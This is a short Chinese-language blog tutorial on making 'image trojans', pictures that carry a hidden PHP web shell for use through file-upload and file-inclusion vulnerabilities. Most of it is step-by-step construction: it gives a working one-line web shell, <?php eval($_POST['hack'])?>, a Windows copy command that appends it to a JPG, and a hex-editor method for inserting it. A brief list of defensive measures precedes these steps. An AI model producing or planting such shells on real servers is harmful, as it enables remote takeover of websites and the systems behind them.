图片木马

图片木马

顾名思义,看上去很像图片的木马。

木马必然是个可执行的程序文件,其后缀名是“exe”。

原理

以文件上传漏洞为基本条件,将可执行的条件写入图片中去,再利用文件包含漏洞来执行图片中存在的一句话木马,从而获取目标服务器的权限。

条件

  • 图片能够正常显示
  • 包含可执行的恶意代码

漏洞防范

  • 尽量使用最新的web服务器版本

  • 图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限)

  • 可以的话,对图片进行二次处理,把木马文件过滤掉

  • 永远不要相信用户的输入

制作方法

  • copy法(这种方法需要用到命令行窗口)

首先,准备好jpg文件和php文件

在这里插入图片描述

php文件内容:<?php eval($_POST['hack'])?>

在这里插入图片描述

使用下面的命令来生成图片木马

copy hack.jpg/b+hack.php/a hehehe.jpg

其中,a表示ASCII码文件,b表示二进制文件

在这里插入图片描述

图片木马制作完成

在这里插入图片描述

对比原图片代码和木马图片代码

在这里插入图片描述

可知,恶意代码已嵌入原图

  • 二进制编辑器法(使用二进制编辑器工具)

这里我使用到的是Editor

打开编辑器后,打开文件

在这里插入图片描述

在任意位置插入木马语句**<?php eval($_POST['hack'])?>**

在这里插入图片描述

保存图片,对比查看原图和木马图片

在这里插入图片描述

  • 其他方法:利用Photoshop插入木马语句,渲染绕过等……

小生不才,以后慢慢再学


版权声明:本文为weixin_52250313原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。